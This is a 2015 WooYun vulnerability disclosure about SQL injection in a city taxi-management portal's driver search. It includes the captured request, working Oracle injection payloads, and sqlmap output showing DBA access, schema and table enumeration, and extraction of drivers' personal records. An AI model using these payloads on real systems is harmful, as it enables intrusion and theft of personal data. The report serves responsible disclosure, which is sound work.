当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147071

漏洞标题:看我如何获取某城市所有出租车驾驶员个人信息的(姓名、身份证、手机、家庭住址等)

相关厂商:某城市出租车管理处

漏洞作者: 洞主

提交时间:2015-10-16 00:38

修复时间:2015-12-04 16:36

公开时间:2015-12-04 16:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-16: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经确认,细节仅向厂商公开
2015-10-30: 细节向核心白帽子及相关领域专家公开
2015-11-09: 细节向普通白帽子公开
2015-11-19: 细节向实习白帽子公开
2015-12-04: 细节向公众公开

简要描述:

妈妈再也不用担心我打不到车了。

详细说明:

问题url:
http://**.**.**.**/WebPortal/DriverInfo.aspx?cid=F973F6861D000905
姓名查询出输入' 报错

1.jpg


输入' and '1'=1 显示正常

2.jpg


提交正常参数用burpsuit抓包,内容为:

POST /WebPortal/DriverInfo.aspx?cid=F973F6861D000905 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://**.**.**.**/WebPortal/DriverInfo.aspx?cid=F973F6861D000905
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.3)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Content-Length: 2132
Pragma: no-cache
Cookie: ASP.NET_SessionId=tfbe5un5qvbejnfbrj0i2355; BIGipServerpool_czcweb=4184123584.17695.0000
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTgyNDM4OTMwNA9kFgICAw9kFgoCAQ9kFgQCAQ8WAh4LXyFJdGVtQ291bnQCBxYOZg9kFgJmDxUDFC9XZWJQb3J0YWwvTmV3cy5hc3B4EEFBNjNENTgwOEI4NDYzNDMM6KGM5Lia6LWE6K6vZAIBD2QWAmYPFQMWL1dlYlBvcnRhbC9QdWJsaWMuYXNweBAxODZGRDFDN0MwRjVGQTAzDOS%2FoeaBr%2BWFrOW8gGQCAg9kFgJmDxUDFi9XZWJQb3J0YWwvUG9saWN5LmFzcHgQMzY1ODVFOENDOTgxMDRFNAzmlL%2FnrZbotYTorq9kAgMPZBYCZg8VAxcvV2ViUG9ydGFsL0NvbXBhbnkuYXNweBBFNUYyMUE3RkIzQkRGNkQ1DOS8geS4muS%2FoeaBr2QCBA9kFgJmDxUDHC9XZWJQb3J0YWwvRXhwb3N1cmVMaXN0LmFzcHgQQ0RBRDZDQzI5MjVGQzMwNAzooYzkuJrnm5HnnaNkAgUPZBYCZg8VAyEvV2ViUG9ydGFsL1dvcmtQcm9jZXNzZXNMaXN0LmFzcHgQMjY2Nzk0RUQ3NTc3NjAzMgzmnI3liqHmjIfljZdkAgYPZBYCZg8VAygvV2ViUG9ydGFsL1BvbGl0aWNhbEludGVyYWN0aW9uTGlzdC5hc3B4EEU5NUZDQkREMDJCREIzNTUM5pS%2F5rCR5LqS5YqoZAIDD2QWBAIBD2QWBAIDDw8WBB4EVGV4dAUM5LyB5Lia5L%2Bh5oGvHgtQb3N0QmFja1VybAUsL1dlYlBvcnRhbC9Db21wYW55LmFzcHg%2FbWlkPUU1RjIxQTdGQjNCREY2RDVkZAIHDw8WBB8BBQ%2Fpqb7pqbblkZjkv6Hmga8fAgUvL1dlYlBvcnRhbC9Ecml2ZXJJbmZvLmFzcHg%2FY2lkPUY5NzNGNjg2MUQwMDA5MDVkZAIFDw9kFgIeB29uY2xpY2sFGXRoaXMuZm9ybS50YXJnZXQ9J19ibGFuaydkAgMPZBYCAgEPFgIfAAIEFghmD2QWAmYPFQMXL1dlYlBvcnRhbC9Db21wYW55LmFzcHgQQTc1NkM4NDNEREIzNEVDNAzkvIHkuJrkv6Hmga9kAgEPZBYCZg8VAxcvV2ViUG9ydGFsL0NhckluZm8uYXNweBBCM0QzNUE0MzE2Qjg5RERCDOi9pui%2BhuS%2FoeaBr2QCAg9kFgJmDxUDGi9XZWJQb3J0YWwvRHJpdmVySW5mby5hc3B4EEY5NzNGNjg2MUQwMDA5MDUP6am%2B6am25ZGY5L%2Bh5oGvZAIDD2QWAmYPFQMUL1dlYlBvcnRhbC9OZXdzLmFzcHgQMjMzNDI2QjIxQjZFQUU0OAzkvIHkuJrliqjmgIFkAgUPDxYCHwEFD%2BmpvumptuWRmOS%2FoeaBr2RkAgsPFgIfAAL%2F%2F%2F%2F%2FD2QCDQ8PFgQeC1JlY29yZGNvdW50Zh4QQ3VycmVudFBhZ2VJbmRleAIBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFE1VDSGVhZGVyMSRidG5TZWFyY2gFCmlidG5TZWFyY2ig6pRqHLsAuX6WFCToA5yx7ue44g%3D%3D&__VIEWSTATEGENERATOR=8AD57CE5&__PREVIOUSPAGE=zULTs4igG4EFeearFv2MiamY3Qlgyn8e1WDGVnSvYvLDp3NInABujMndM12mAmKShhZF-P2VPrwHBDHZfe8bxt7-kAu8aaXRhsfWJJb4chH-JWTR0&__EVENTVALIDATION=%2FwEWCAKdodnEAgKemcGGBgL0sL7KDQLZtY%2FGAwL6iuvMDAK4kLvqAgLRqb%2BCAQKPnrNoO%2F6cSo%2BN7RscJYLcgsS6WewNzT4%3D&UCHeader1%24keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9C%E7%B4%A2%E5%85%B3%E9%94%AE%E5%AD%97&txtDriverName=123&ibtnSearch.x=25&ibtnSearch.y=13


用sqlmap跑一下;
数据库用户名DB 权限为DBA

C:\Python27\sqlmap1.0\sqlmap>sqlmap.py -r d:\5.txt --current-user --is-dba
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150915}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respo
sible for any misuse or damage caused by this program
[*] starting at 23:54:07
d:\5.txt
[23:54:07] [INFO] parsing HTTP request from 'd:\5.txt'
d:\5.txt
[23:54:07] [WARNING] provided value for parameter '__EVENTTARGET' is empty. Ple
se, always use only valid parameter values so sqlmap could be able to run prope
ly
[23:54:07] [WARNING] provided value for parameter '__EVENTARGUMENT' is empty. P
ease, always use only valid parameter values so sqlmap could be able to run pro
erly
[23:54:07] [INFO] resuming back-end DBMS 'oracle'
[23:54:07] [INFO] testing connection to the target URL
[23:54:07] [INFO] heuristically checking if the target is protected by some kin
 of WAF/IPS/IDS
[23:54:08] [INFO] it appears that the target is not protected
sqlmap identified the following injection points with a total of 0 HTTP(s) requ
sts:
---
Parameter: txtDriverName (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTgyNDM4OTMwNA
kFgICAw9kFgoCAQ9kFgQCAQ8WAh4LXyFJdGVtQ291bnQCBxYOZg9kFgJmDxUDFC9XZWJQb3J0YWwvTm
3cy5hc3B4EEFBNjNENTgwOEI4NDYzNDMM6KGM5Lia6LWE6K6vZAIBD2QWAmYPFQMWL1dlYlBvcnRhbC
QdWJsaWMuYXNweBAxODZGRDFDN0MwRjVGQTAzDOS/oeaBr+WFrOW8gGQCAg9kFgJmDxUDFi9XZWJQb3
0YWwvUG9saWN5LmFzcHgQMzY1ODVFOENDOTgxMDRFNAzmlL/nrZbotYTorq9kAgMPZBYCZg8VAxcvV2
iUG9ydGFsL0NvbXBhbnkuYXNweBBFNUYyMUE3RkIzQkRGNkQ1DOS8geS4muS/oeaBr2QCBA9kFgJmDx
DHC9XZWJQb3J0YWwvRXhwb3N1cmVMaXN0LmFzcHgQQ0RBRDZDQzI5MjVGQzMwNAzooYzkuJrnm5Hnna
kAgUPZBYCZg8VAyEvV2ViUG9ydGFsL1dvcmtQcm9jZXNzZXNMaXN0LmFzcHgQMjY2Nzk0RUQ3NTc3Nj
zMgzmnI3liqHmjIfljZdkAgYPZBYCZg8VAygvV2ViUG9ydGFsL1BvbGl0aWNhbEludGVyYWN0aW9uTG
zdC5hc3B4EEU5NUZDQkREMDJCREIzNTUM5pS/5rCR5LqS5YqoZAIDD2QWBAIBD2QWBAIDDw8WBB4EVG
4dAUM5LyB5Lia5L+h5oGvHgtQb3N0QmFja1VybAUsL1dlYlBvcnRhbC9Db21wYW55LmFzcHg/bWlkPU
1RjIxQTdGQjNCREY2RDVkZAIHDw8WBB8BBQ/pqb7pqbblkZjkv6Hmga8fAgUvL1dlYlBvcnRhbC9Ecm
2ZXJJbmZvLmFzcHg/Y2lkPUY5NzNGNjg2MUQwMDA5MDVkZAIFDw9kFgIeB29uY2xpY2sFGXRoaXMuZm
ybS50YXJnZXQ9J19ibGFuaydkAgMPZBYCAgEPFgIfAAIEFghmD2QWAmYPFQMXL1dlYlBvcnRhbC9Db2
wYW55LmFzcHgQQTc1NkM4NDNEREIzNEVDNAzkvIHkuJrkv6Hmga9kAgEPZBYCZg8VAxcvV2ViUG9ydG
sL0NhckluZm8uYXNweBBCM0QzNUE0MzE2Qjg5RERCDOi9pui+huS/oeaBr2QCAg9kFgJmDxUDGi9XZW
Qb3J0YWwvRHJpdmVySW5mby5hc3B4EEY5NzNGNjg2MUQwMDA5MDUP6am+6am25ZGY5L+h5oGvZAIDD2
WAmYPFQMUL1dlYlBvcnRhbC9OZXdzLmFzcHgQMjMzNDI2QjIxQjZFQUU0OAzkvIHkuJrliqjmgIFkAg
PDxYCHwEFD+mpvumptuWRmOS/oeaBr2RkAgsPFgIfAAL/////D2QCDQ8PFgQeC1JlY29yZGNvdW50Zh
QQ3VycmVudFBhZ2VJbmRleAIBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFE1
DSGVhZGVyMSRidG5TZWFyY2gFCmlidG5TZWFyY2ig6pRqHLsAuX6WFCToA5yx7ue44g==&__VIEWSTA
EGENERATOR=8AD57CE5&__PREVIOUSPAGE=zULTs4igG4EFeearFv2MiamY3Qlgyn8e1WDGVnSvYvLD
3NInABujMndM12mAmKShhZF-P2VPrwHBDHZfe8bxt7-kAu8aaXRhsfWJJb4chH-JWTR0&__EVENTVAL
DATION=/wEWCAKdodnEAgKemcGGBgL0sL7KDQLZtY/GAwL6iuvMDAK4kLvqAgLRqb+CAQKPnrNoO/6c
o+N7RscJYLcgsS6WewNzT4=&UCHeader1$keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9C
E7%B4%A2%E5%85%B3%E9%94%AE%E5%AD%97&txtDriverName=123' AND 9063=(SELECT UPPER(X
LType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(106)||CHR(112)||CHR(113)||(SELE
T (CASE WHEN (9063=9063) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(
06)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'RaDy'='RaDy&ibtnSearch.x=25&
btnSearch.y=13
    Type: AND/OR time-based blind
    Title: Oracle OR time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTgyNDM4OTMwNA
kFgICAw9kFgoCAQ9kFgQCAQ8WAh4LXyFJdGVtQ291bnQCBxYOZg9kFgJmDxUDFC9XZWJQb3J0YWwvTm
3cy5hc3B4EEFBNjNENTgwOEI4NDYzNDMM6KGM5Lia6LWE6K6vZAIBD2QWAmYPFQMWL1dlYlBvcnRhbC
QdWJsaWMuYXNweBAxODZGRDFDN0MwRjVGQTAzDOS/oeaBr+WFrOW8gGQCAg9kFgJmDxUDFi9XZWJQb3
0YWwvUG9saWN5LmFzcHgQMzY1ODVFOENDOTgxMDRFNAzmlL/nrZbotYTorq9kAgMPZBYCZg8VAxcvV2
iUG9ydGFsL0NvbXBhbnkuYXNweBBFNUYyMUE3RkIzQkRGNkQ1DOS8geS4muS/oeaBr2QCBA9kFgJmDx
DHC9XZWJQb3J0YWwvRXhwb3N1cmVMaXN0LmFzcHgQQ0RBRDZDQzI5MjVGQzMwNAzooYzkuJrnm5Hnna
kAgUPZBYCZg8VAyEvV2ViUG9ydGFsL1dvcmtQcm9jZXNzZXNMaXN0LmFzcHgQMjY2Nzk0RUQ3NTc3Nj
zMgzmnI3liqHmjIfljZdkAgYPZBYCZg8VAygvV2ViUG9ydGFsL1BvbGl0aWNhbEludGVyYWN0aW9uTG
zdC5hc3B4EEU5NUZDQkREMDJCREIzNTUM5pS/5rCR5LqS5YqoZAIDD2QWBAIBD2QWBAIDDw8WBB4EVG
4dAUM5LyB5Lia5L+h5oGvHgtQb3N0QmFja1VybAUsL1dlYlBvcnRhbC9Db21wYW55LmFzcHg/bWlkPU
1RjIxQTdGQjNCREY2RDVkZAIHDw8WBB8BBQ/pqb7pqbblkZjkv6Hmga8fAgUvL1dlYlBvcnRhbC9Ecm
2ZXJJbmZvLmFzcHg/Y2lkPUY5NzNGNjg2MUQwMDA5MDVkZAIFDw9kFgIeB29uY2xpY2sFGXRoaXMuZm
ybS50YXJnZXQ9J19ibGFuaydkAgMPZBYCAgEPFgIfAAIEFghmD2QWAmYPFQMXL1dlYlBvcnRhbC9Db2
wYW55LmFzcHgQQTc1NkM4NDNEREIzNEVDNAzkvIHkuJrkv6Hmga9kAgEPZBYCZg8VAxcvV2ViUG9ydG
sL0NhckluZm8uYXNweBBCM0QzNUE0MzE2Qjg5RERCDOi9pui+huS/oeaBr2QCAg9kFgJmDxUDGi9XZW
Qb3J0YWwvRHJpdmVySW5mby5hc3B4EEY5NzNGNjg2MUQwMDA5MDUP6am+6am25ZGY5L+h5oGvZAIDD2
WAmYPFQMUL1dlYlBvcnRhbC9OZXdzLmFzcHgQMjMzNDI2QjIxQjZFQUU0OAzkvIHkuJrliqjmgIFkAg
PDxYCHwEFD+mpvumptuWRmOS/oeaBr2RkAgsPFgIfAAL/////D2QCDQ8PFgQeC1JlY29yZGNvdW50Zh
QQ3VycmVudFBhZ2VJbmRleAIBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFE1
DSGVhZGVyMSRidG5TZWFyY2gFCmlidG5TZWFyY2ig6pRqHLsAuX6WFCToA5yx7ue44g==&__VIEWSTA
EGENERATOR=8AD57CE5&__PREVIOUSPAGE=zULTs4igG4EFeearFv2MiamY3Qlgyn8e1WDGVnSvYvLD
3NInABujMndM12mAmKShhZF-P2VPrwHBDHZfe8bxt7-kAu8aaXRhsfWJJb4chH-JWTR0&__EVENTVAL
DATION=/wEWCAKdodnEAgKemcGGBgL0sL7KDQLZtY/GAwL6iuvMDAK4kLvqAgLRqb+CAQKPnrNoO/6c
o+N7RscJYLcgsS6WewNzT4=&UCHeader1$keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9C
E7%B4%A2%E5%85%B3%E9%94%AE%E5%AD%97&txtDriverName=-6174' OR 1375=DBMS_PIPE.RECE
VE_MESSAGE(CHR(108)||CHR(118)||CHR(100)||CHR(115),5) AND 'vvDv'='vvDv&ibtnSearc
.x=25&ibtnSearch.y=13
---
[23:54:08] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[23:54:08] [INFO] fetching current user
[23:54:08] [INFO] resumed: DB
current user:    'DB'
[23:54:08] [INFO] testing if current user is DBA
current user is DBA:    True


查看下当前的库

[23:56:03] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[23:56:03] [WARNING] schema names are going to be used on Oracle for enumeratio
 as the counterpart to database names on other DBMSes
[23:56:03] [INFO] fetching database (schema) names
[23:56:03] [INFO] the SQL query used returns 12 entries
[23:56:03] [INFO] resumed: CYZGDB
[23:56:03] [INFO] resumed: DB
[23:56:03] [INFO] resumed: DBSNMP
[23:56:03] [INFO] resumed: EXFSYS
[23:56:03] [INFO] resumed: OUTLN
[23:56:03] [INFO] resumed: SYS
[23:56:03] [INFO] resumed: SYSMAN
[23:56:03] [INFO] resumed: SYSTEM
[23:56:03] [INFO] resumed: TESTDB
[23:56:03] [INFO] resumed: TPMANAGER
[23:56:03] [INFO] resumed: TSMSYS
[23:56:03] [INFO] resumed: WMSYS
available databases [12]:
[*] CYZGDB
[*] DB
[*] DBSNMP
[*] EXFSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TESTDB
[*] TPMANAGER
[*] TSMSYS
[*] WMSYS


进一步查询库CYZGDB中的表,表很多,只截取部分

Database: CYZGDB
[64 tables]
+--------------------------+
| BASEDEPARTMENT           |
| BASEEXCEPTION            |
| BASEITEMDETAILS          |
| BASEITEMS                |
| BASELOG                  |
| BASEMODULE               |
| BASEOBJECTPERMISSION     |
| BASEPARAM                |
| BASEPERMISSION           |
| BASEROLE                 |
| BASESEQ                  |
| BASEUSER                 |
| BASEUSERPARAM            |
| BASEUSERPROJECT          |
| BASEUSERROLE             |
| CLIENT_TAXT_NOTICE       |
| TABLE_YEAR_SEQID         |
| TAXI_APPLYEXAM           |
| TAXI_CANCELSTATIS        |
| TAXI_CONCOMPANY          |
| TAXI_CONPLANCHECK        |
| TAXI_CONTEACHERS         |
| TAXI_CONTINUESTUDY       |
| TAXI_CONTINUESTUDY2      |
| TAXI_COSTFEE             |
| TAXI_COURSEID            |
| TAXI_DRIVER              |
| TAXI_EXAMFEE             |
| TAXI_EXAMPLAN            |
| TAXI_EXCHAGEEAXM         |
| TAXI_EXCHAGETERM         |
| TAXI_FAILSCORESTUDENT    |
| TAXI_IPRECORD            |
| TAXI_LINK                |
| TAXI_LOGOUTSTUDENT       |
| TAXI_NOTREAINREG         |
| TAXI_OUTLINE             |
| TAXI_PHOTO               |
| TAXI_PLANT               |
| TAXI_QUALITYAPPLY        |
| TAXI_QUALITYREG          |
| TAXI_REGISTRATION        |
| TAXI_STUDENTLEARNLIST    |
| TAXI_STUDENT_DATE        |
| TAXI_STUDYCONDITION      |
| TAXI_STUNDENTINFO_IMPORT |
| TAXI_STUNDENTPRINTLOG    |
| TAXI_TEACHERINFO         |
| TAXI_TRAINREQUEST        |
| TAXT_REGQUALITYDATA      |
| TAXT_STUNDENTDATA        |
| TEMPAPPLYEXAMNOTRAIN     |
| TEMPAPPLYEXAMSTULEARN    |
| TEMPAPPLYMAKEUPINFO      |
| TEMPAUDITINGAPPLYEXAM    |
| TEMPAUDITINGEXAMNOTRAIN  |
| TEMPAUDITINGEXAMSTULEARN |
| TEMPEXAMPLAN             |
| TEMPMAKEUPINFO           |
| TEMPNOTRAINSTUINFO       |
| TEMPQUALITYAPPLY         |
| TEMPREGISTINFO           |
| TEMPSTULEARNINFO         |
| TEMPTRAINPLANINFO        |
+--------------------------+


查询表TAXI_DRIVER中的内容:

3.jpg


数据量很大,只截取了部分,还有其它表都没看,内容也不少!

漏洞证明:

已证明!

修复方案:

参数过滤!

版权声明:转载请注明来源 洞主@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-10-20 16:34

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发陕西分中心,由其后续协调网站管理单位处置。

最新状态:

暂无